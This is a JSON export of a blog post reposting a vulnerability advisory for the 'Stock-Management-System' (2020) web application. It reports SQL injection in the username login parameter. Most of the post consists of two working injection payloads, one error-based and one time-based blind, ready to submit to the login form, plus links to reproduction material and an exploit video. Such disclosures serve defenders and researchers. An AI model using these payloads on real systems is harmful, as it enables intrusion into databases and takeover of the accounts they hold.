{"id":26536,"date":"2022-07-04T20:39:59","date_gmt":"2022-07-04T16:39:59","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167686\/sms2020-sql.txt"},"modified":"2022-07-12T08:42:55","modified_gmt":"2022-07-12T04:12:55","slug":"stock-management-system-2020-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/stock-management-system-2020-sql-injection\/","title":{"rendered":"Stock Management System 2020 SQL Injection"},"content":{"rendered":"

## Title: Stock-Management-System-2020 SQLi
\n## Author: nu11secur1ty
\n## Date: 07.02.2022
\n## Vendor: https:\/\/github.com\/Dav-ee
\n## Software: https:\/\/github.com\/Dav-ee\/Stock-Management-System
\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/Kiprono-Davies\/2022\/Stock-Management-System-2020<\/p>\n

## Description:
\nThe username parameter appears to be vulnerable to SQL injection attacks.
\nThe attacker kan take an access to all acounts on this system.
\nStatus: CRITICAL<\/p>\n

[+] Payloads:<\/p>\n

“`mysql
\n—
\nParameter: username (POST)
\nType: error-based
\nTitle: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or
\nGROUP BY clause (FLOOR)
\nPayload: username=RCIdtbFU”’ AND (SELECT 9919 FROM(SELECT
\nCOUNT(*),CONCAT(0x71787a6271,(SELECT
\n(ELT(9919=9919,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM
\nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND
\n‘LcYi’=’LcYi&password=g5X!p2l!Q6<\/p>\n

Type: time-based blind
\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
\nPayload: username=RCIdtbFU”’ AND (SELECT 6942 FROM
\n(SELECT(SLEEP(5)))NOpI) AND ‘uUsT’=’uUsT&password=g5X!p2l!Q6
\n—<\/p>\n

“`<\/p>\n

## Reproduce:
\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/Kiprono-Davies\/2022\/Stock-Management-System-2020)<\/p>\n

## Proof and Exploit:
\n[href](https:\/\/streamable.com\/urkvz7)<\/p>\n","protected":false},"excerpt":{"rendered":"

## Title: Stock-Management-System-2020 SQLi ## Author: nu11secur1ty ## Date: 07.02.2022 ## Vendor: https:\/\/github.com\/Dav-ee ## Software: https:\/\/github.com\/Dav-ee\/Stock-Management-System ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/Kiprono-Davies\/2022\/Stock-Management-System-2020 ## Description: The username parameter appears to be vulnerable to SQL injection attacks. The attacker kan take an access to all acounts on this system. Status: CRITICAL [+] Payloads: “`mysql — Parameter: username (POST) Type: error-based …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-26536","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/26536","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=26536"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/26536\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=26536"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=26536"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=26536"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}